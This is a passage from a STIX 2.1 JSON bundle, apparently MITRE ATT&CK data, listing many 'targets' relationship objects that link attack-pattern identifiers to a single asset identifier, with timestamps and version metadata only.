"x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cda38590-f43b-4fe4-b88a-b0a3f6173528", "created": "2024-07-01T10:37:15.835636", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835638", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9b96b09e-3bfe-41a3-bece-8f74415a00c8", "created": "2024-07-01T10:37:15.835646", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835648", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0fe343b0-2363-4f10-9989-ce6fa04e3f1c", "created": "2024-07-01T10:37:15.835656", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835658", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--11501a67-0427-43b7-b7fa-e910e5c8928f", "created": "2024-07-01T10:37:15.835665", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835667", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--803b2972-a16e-41ad-81d5-a157acb9f6d0", "created": "2024-07-01T10:37:15.835675", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835677", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--163c681b-8485-43b4-aa8c-e31a1dd4ef5d", "created": "2024-07-01T10:37:15.835684", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835686", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ac8d574-1418-4ebf-8f88-2f77de597f1d", "created": "2024-07-01T10:37:15.835694", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835696", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--91c5da0b-7991-4d9b-b0ff-f72ccc5808f5", "created": "2024-07-01T10:37:15.835704", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835706", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4f38413b-2c92-4bcf-a009-694c68ac20ed", "created": "2024-07-01T10:37:15.835713", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835715", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--93456d3c-5691-4f19-b91d-87e5aec1b77b", "created": "2024-07-01T10:37:15.835723", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835725", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--56105802-4d22-46e3-b52d-77eff6d3a328", "created": "2024-07-01T10:37:15.835732", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835734", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--59563c4c-fb57-436d-9227-9fb04158ddc3", "created": "2024-07-01T10:37:15.835742", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835744", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7962773d-1bc3-4398-a2c2-d19506cc7511", "created": "2024-07-01T10:37:15.835752", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835754", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6d988df1-43e4-4cd8-a7aa-a108dc2aba26", "created": "2024-07-01T10:37:15.835761", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835763", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--27fdfb87-1fef-4de5-9ab0-b094fe4be904", "created": "2024-07-01T10:37:15.835771", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835773", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--305d3230-bda7-474d-a84f-c5d8ea39ac02", "created": "2024-07-01T10:37:15.835781", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835783", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--92559a08-02dd-4a9e-86f7-4ceec8853c49", "created": "2024-07-01T10:37:15.835790", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835792", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--36eae0d1-2702-48a0-b366-840774b7c167", "created": "2024-07-01T10:37:15.835800", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835802", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ccfb7ccc-9cde-4ee8-8fb6-a42c2d3bf9b0", "created": "2024-07-01T10:37:15.835809", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835811", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e79b4d46-d670-4688-86e1-589a5b9d524e", "created": "2024-07-01T10:37:15.835819", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835821", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dbe143c3-625a-4e4d-b1ea-2230e401593c", "created": "2024-07-01T10:37:15.835829", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835831", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--178b7cf6-383e-4104-9c78-99fa5d015a9f", "created": "2024-07-01T10:37:15.835838", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835841", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--57f593a8-db93-4c62-8950-77e2a2b1aa76", "created": "2024-07-01T10:37:15.835848", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835850", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--23555320-4793-4e36-8e0c-a6229d5eb6aa", "created": "2024-07-01T10:37:15.835858", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835860", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2b01fd47-03a5-4d47-9746-e007313e1b2e", "created": "2024-07-01T10:37:15.835867", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835870", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7ec2ffe4-639a-4706-90b5-fbe3b98d4c8b", "created": "2024-07-01T10:37:15.835877", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835879", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c28d23d2-86e0-4ced-a7b9-3b95ba41c951", "created": "2024-07-01T10:37:15.835887", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835889", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ea765306-9792-41f4-823e-107621cbbf2f", "created": "2024-07-01T10:37:15.835896", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835898", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9b84af3a-db9d-4248-ac8a-1326265d406c", "created": "2024-07-01T10:37:15.835906", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835908", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b0285f1f-0ae2-4c47-914a-cddf22ca6c1a", "created": "2024-07-01T10:37:15.835915", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835918", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--26356494-3555-42a8-a2e1-da356d53712c", "created": "2024-07-01T10:37:15.835925", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835927", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e1ffb7e2-d9aa-4660-85a9-9dc015626728", "created": "2024-07-01T10:37:15.835935", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835937", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--83bfc6e0-3bf0-4e27-8669-b679b8f15b53", "created": "2024-07-01T10:37:15.835944", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835946", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b20efbf-8063-4fc3-a07d-b575318a301b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7fabd9d9-7141-45b9-94a6-1b0b4e8e28b9", "created": "2024-07-01T10:37:15.835954", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835956", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6fe655b4-848d-45fb-9198-bdd5298f7896", "created": "2024-07-01T10:37:15.835964", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835966", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--41a164bb-e8e7-495b-b932-36b51757bcb1", "created": "2024-07-01T10:37:15.835973", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835975", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ef6e96f9-0e68-44c2-8421-9fbbdd961589", "created": "2024-07-01T10:37:15.835983", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835985", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f3c5e2f7-3bac-4af9-834e-8ba05546e7e5", "created": "2024-07-01T10:37:15.835993", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835995", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--968f8784-6ea1-4fac-a4f2-737e0fdcd404", "created": "2024-07-01T10:37:15.836002", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836004", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e5806a13-e24a-4391-b659-b70b34e1751f", "created": "2024-07-01T10:37:15.836012", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836014", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f57a74b2-8ba2-417b-bad2-f6e0e0b2778c", "created": "2024-07-01T10:37:15.836022", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836024", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": 